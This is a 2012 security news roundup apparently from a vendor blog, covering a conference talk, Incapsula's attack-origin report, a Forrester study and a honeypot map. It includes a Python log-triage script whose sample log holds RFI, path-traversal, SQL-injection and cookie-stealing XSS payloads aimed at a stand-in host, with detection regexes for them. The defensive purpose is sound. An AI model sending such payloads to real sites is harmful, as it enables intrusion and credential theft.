Surviving the Week 9/21/12

2012 HouSecCon, 10/11/2012 (in Houston)

HouSecCon is coming up on October 11th in Houston. The agenda is shaping up with a number of hot topics and well-known speakers. I (Dan Kuykendall) will be speaking on mobile security. At NT OBJECTives we have been working on how to effectively test the service calls that mobile applications make to their back ends. Most of the mobile security focus is on device security; this talk goes beyond device security and into mobile application hacking, with several demos and hacking tools. Hope to see you there!

Top Security Threats and Attackers by Country

Web security firm Incapsula this week released the first of what it says will be a monthly report that breaks down the origin of Internet attacks by country. The first survey confirmed that the U.S. and China produce the highest volume of attacks on websites, but they don’t necessarily have the most hackers per capita operating from within their borders.

There are four main types of website attacks, according to Incapsula. Server takeovers by means of Remote File Inclusion (RFI), Local File Inclusion (LFI), Directory Traversal and other methods are the most common, in part because they are easy to automate, the company said. Data theft by means of SQL injection and credential theft through cross-site scripting (XSS) are the other two main types of directly damaging attack, while the fourth type, vulnerability scanning, is more akin to “casing” a website for future direct attacks.

http://www.incapsula.com/the-incapsula-blog/item/397-top-security-threats-and-attackers-by-country
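The four categories Incapsula describes map naturally onto web-server log triage: three of them leave a recognizable payload in a single request, while "casing" only shows up when you aggregate per source. The following is an added example, not code from the original post or from Incapsula. It is a small Python classifier that parses constructed Apache-style access-log lines (the sample lines, addresses, hostnames and paths are made up), percent-decodes each request, labels it as RFI, LFI/traversal, SQL injection or XSS, and flags scanning by counting 404 responses per source IP. The regexes, the label names and the 404 threshold are assumptions chosen for illustration, not a production rule set.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines in Apache "common" format (not real traffic).
# Source addresses come from documentation ranges; hostnames and paths are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Sep/2012:10:01:02 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 512
203.0.113.5 - - [21/Sep/2012:10:01:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024
198.51.100.7 - - [21/Sep/2012:10:02:00 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%20user,password%20FROM%20users-- HTTP/1.1" 500 300
198.51.100.7 - - [21/Sep/2012:10:02:05 +0000] "GET /search.php?q=%3Cscript%3Edocument.location%3D%27http://evil.example/c%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 200
192.0.2.9 - - [21/Sep/2012:10:03:00 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 150
192.0.2.9 - - [21/Sep/2012:10:03:01 +0000] "GET /admin/ HTTP/1.1" 404 150
192.0.2.9 - - [21/Sep/2012:10:03:02 +0000] "GET /wp-login.php HTTP/1.1" 404 150
192.0.2.9 - - [21/Sep/2012:10:03:03 +0000] "GET /.git/config HTTP/1.1" 404 150
192.0.2.9 - - [21/Sep/2012:10:03:04 +0000] "GET /backup.zip HTTP/1.1" 404 150
192.0.2.9 - - [21/Sep/2012:10:03:05 +0000] "GET /robots.txt HTTP/1.1" 200 80
203.0.113.77 - - [21/Sep/2012:10:04:00 +0000] "GET /about.html HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signature patterns (assumptions for illustration; real rule sets are far larger).
RFI_RE = re.compile(r'^\s*(?:(?:https?|ftp|file|php|expect)://|data:)', re.I)
LFI_RE = re.compile(r'\.\.[/\\]|^/etc/|/proc/self/', re.I)
SQLI_RE = re.compile(
    r"\bunion\b.{0,20}\bselect\b|'\s*(?:or|and)\s+[\w']+\s*=\s*[\w']+"
    r"|\b(?:sleep|benchmark)\s*\(|information_schema|--\s*$",
    re.I,
)
XSS_RE = re.compile(r'<\s*(?:script|img|svg)\b|javascript\s*:|\bon\w+\s*=|document\.cookie', re.I)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (e.g. %252e%252e) are caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return an Incapsula-style attack label for one request target, or None."""
    parts = urlsplit(target)
    path = fully_decode(parts.path)
    values = [path] + [fully_decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    # Order matters: the server-takeover signatures are the most specific, so they
    # are checked before the SQLi and XSS patterns, which match looser token shapes.
    for v in values:
        if RFI_RE.search(v):
            return "server takeover (RFI)"
    for v in values:
        if LFI_RE.search(v):
            return "server takeover (LFI/traversal)"
    for v in values:
        if SQLI_RE.search(v):
            return "data theft (SQL injection)"
    for v in values:
        if XSS_RE.search(v):
            return "credential theft (XSS)"
    return None


def analyze(log_text, scan_404_threshold=4):
    """Label direct attacks per request and flag sources that are 'casing' the site.

    Scanning rarely carries an attack payload; it shows up as one source probing
    many paths that do not exist, so it is detected on the aggregate 404 count per
    IP. The threshold is an assumption; tune it to the site's normal 404 rate."""
    events, not_found = [], defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count and alert on these
        ip, target, status = m.group('ip'), m.group('target'), int(m.group('status'))
        if status == 404:
            not_found[ip] += 1
        label = classify_request(target)
        if label:
            events.append((ip, target, label))
    scanners = sorted(ip for ip, n in not_found.items() if n >= scan_404_threshold)
    return {"events": events, "scanners": scanners}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, target, label in report["events"]:
        print(f"{label:32s} {ip:14s} {target}")
    for ip in report["scanners"]:
        print(f"{'vulnerability scanning':32s} {ip:14s} (repeated 404s)")
```

Two design points worth noting. Decoding is repeated until the value stops changing, because a single `unquote` misses the double-encoded traversal strings that automated tools send to slip past naive filters. Scanning is deliberately not a per-request signature: a probe for `/phpmyadmin/` is indistinguishable from a typo on its own, and only the per-source 404 volume separates a scanner from a user. Signature matching of this kind is easy to evade with obfuscation, so treat it as a triage aid for log review, not as a substitute for fixing the injection points themselves.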

Over Half of Companies Suffered a Web Application Security Breach in the Last 18 Months

Forrester Report published.
The results of “The Software Security Risk Report,” a commissioned study conducted by Forrester Consulting on behalf of Coverity were released this week. This study looked at application security and testing practices and found that security incidents are becoming more common and expensive. The results included several interesting findings:

Most companies experienced at least one breach in the last 18 months and many companies lost hundreds of thousands, if not millions, of dollars.

The majority of companies have not implemented secure development practices, “most often citing time-to-market pressures, funding and the lack of appropriate technologies suitable for use during development as their primary roadblocks.”

HoneyMap – Alpha

A real-time world map which visualizes attacks captured by honeypots of the Honeynet Project. Red markers on the map stand for attacks, yellow markers are sensors (honeypots).

This project is highly experimental and should be considered an ALPHA version. Current Chrome and Firefox browsers should work; Opera, Safari and Internet Explorer probably won’t.

http://map.honeycloud.net/